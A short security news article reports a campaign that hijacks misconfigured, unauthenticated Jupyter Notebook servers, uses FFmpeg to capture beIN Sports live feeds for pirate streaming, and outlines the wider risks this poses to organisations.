HQ/EMEAFind out how we can help your business
A new malicious campaign is targeting misconfigured Jupyter Notebooks to broadcast illegal videos.
Based on reports, malicious actors are employing vulnerable JupyterLab and Jupyter Notebooks to rip streams and facilitate sports piracy using live streaming capture software solutions. Moreover, a recent assessment of the newly discovered malicious operation includes hijacking unauthenticated Jupyter Notebooks to acquire initial access and then performing a sequence of activities to permit illegal live streaming of sporting events.
The cloud security firm identified the piracy effort in interactive settings commonly used for data science applications following an attack on its honeypots. Additionally, the threat actors in this campaign initially updated the server before downloading the program FFmpeg.
This tactic is crucial to the illegal activity as it is insufficient to prevent security tools from detecting malicious activity. Subsequently, the attackers used FFmpeg to grab live broadcasts of sporting events and redirect them to their site, which streams pirated videos.
The primary objective of hijacking Jupyter Notebooks is to steal legitimate sporting event streams and post them on a website that can gather viewers.
According to investigations, the primary purpose of the hacking campaign on Jupyter Notebooks is to download FFmpeg from MediaFire and use it to record live sports event feeds from Qatar’s beIN Sports network.
Next, the threat actors will reproduce the stream on their illegal server via ustream[.]tv. This activity not only promotes the abuse of the compromised Jupyter Notebook server and its resources by acting as an intermediary but also allows threat actors to earn from advertising income by illegally streaming live broadcasts.
Researchers have yet to attribute this campaign to any known threat groups. However, a separate report revealed that one IP address that the threat actors utilised implies that they may be an Arab-speaking organisation.
Still, it is important to note that the attackers acquired access to a server used for data analysis, which might have significant ramifications for any organisation’s operations.
The campaign poses various threats, such as DDoS, data manipulation, data theft, AI and ML process corruption, lateral movement to more vital environments, and significant financial and reputational harm.
